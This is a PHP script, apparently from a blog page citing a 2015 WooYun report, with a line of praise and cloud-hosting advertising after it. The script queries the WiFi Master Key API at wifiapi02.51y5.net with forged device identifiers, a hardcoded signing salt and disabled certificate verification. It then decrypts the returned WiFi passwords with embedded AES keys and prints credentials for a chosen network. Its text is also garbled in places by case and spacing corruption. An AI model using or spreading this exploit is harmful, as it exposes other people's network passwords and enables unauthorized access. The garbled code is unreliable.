<?php//some code from HTTP://WWW.WOOYUN.ORG/BUGS/WOOYUN-2015-099268$BSSID = "c8:3a:35:fa:b8:80"; $ssid = " Podinns2f03 "; if (Isset ($BSSID) && isset ($ssid)) {//update Salt $ret = Request ($bssid, $SSID, MD5 (rand (1, 10000))); $ret = Json_decode ($ret); $ret = Request ($bssid, $ssid, $ret->RETSN); $ret = Json_decode ($ret); if ($ret->retcd = = 0) {if ($ret->qryapwd->retcd = = 0) {$list = $ret->qryapwd->psws; foreach ($list as $wifi) {echo ' SSID: '. $wifi->ssid. "\ n"; Echo ' PWD: '. Decryptstrin ($wifi->pwd). "\ n"; Echo ' BSSID: '. $wifi->bssid. "\ n"; if ($wifi->xuser) {echo ' Xuser: '. $wifi->xuser. "\ n"; Echo ' xpwd: '. $wifi->xpwd. "\ n"; }}} else {echo $ret->qryapwd->retmsg; }}}function Request ($bssid, $ssid, $salt, $dhid = ' ff8080814cc5798a014ccbbdfa375369 ') {$data = array (); $data[' appid '] = ' 0008 '; $data [' bssid '] = $bssid; $data [' chanid '] = ' GW '; $data [' dhid '] = $dhid; $data [' II '] = ' 609537f302fc6c32907a935fb4bf7ac9 '; $data [' lang '] = ' cn '; $data [' mac '] = ' 60f81dad28de '; $data [' method '] = ' getdeepsecchkswitch '; $data [' pid '] = ' qryapwd:commonswitch '; $data [' ssid '] = $ssid; $data [' st '] = ' m '; $data [' uhid '] = ' a0000000000000000000000000000001 '; $data [' V '] = ' 324 '; $data [' sign '] = sign ($data, $salt); $curl = Curl_init (); curl_setopt ($curl, Curlopt_url, ' http://wifiapi02.51y5.net/wifiapi/fa.cmd '); curl_setopt ($curl, Curlopt_useragent, ' wifimasterkey/1.1.0 (Mac OS X Version 10.10.3 (Build 14d136) '); curl_setopt ($curl, Curlopt_ssl_verifypeer, false); Stop Verifying certificate curl_setopt ($curl, Curlopt_returntransfer, true); curl_setopt ($curl, Curlopt_post, true); Enable Posting curl_setopt ($curl, Curlopt_postfields, Http_build_query ($data)); PosT images curl_setopt ($curl, curlopt_followlocation, true); If any redirection after upload $r = curl_exec ($curl); Curl_close ($curl); return $r;} function Registernewdevice () {$salt = ' 1hf%5yh&7og$1wh!6vr&7rs!3nj#1aa$ '; $data = Array (); $data [' appid '] = ' 0008 '; $data [' bssid '] = $bssid; $data [' chanid '] = ' GW '; $data [' dhid '] = $dhid; $data [' II '] = ' 609537f302fc6c32907a935fb4bf7ac9 '; $data [' lang '] = ' cn '; $data [' mac '] = ' 60f81dad28de '; $data [' method '] = ' getdeepsecchkswitch '; $data [' pid '] = ' qryapwd:commonswitch '; $data [' ssid '] = $ssid; $data [' st '] = ' m '; $data [' uhid '] = ' a0000000000000000000000000000001 '; $data [' V '] = ' 324 '; $data [' sign '] = sign ($data, $salt);} function sign ($array, $salt) {//Signature algorithm $request _str = '; corresponding to the Arrays.sort array in the APK ordering, test PHP needs Ksort ksort ($array); foreach ($array as $key = + $value) {$request _str. = $value; } $sign = MD5 ($request _str. $salt); Return Strtoupper ($sign);} function Decryptstrin ($str, $keys = ' k%7ve#8ie!5fb&8e ', $iv = ' y!0oe#2wj#6pw!3v ', $cipher _alg =mcrypt_rijndael_128 {//wi-fi* password is encrypted using aes/cbc/nopadding mode//[length][password][timestamp] $decrypted _string = Mcrypt_decrypt ($cipher _a LG, $keys, Pack ("h*", $str), MCRYPT_MODE_CBC, $IV); Return substr (Trim ($decrypted _string), 3,-13);} ?>
The above code is very simple, wifi* password query interface code is all finished, I hope you like.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
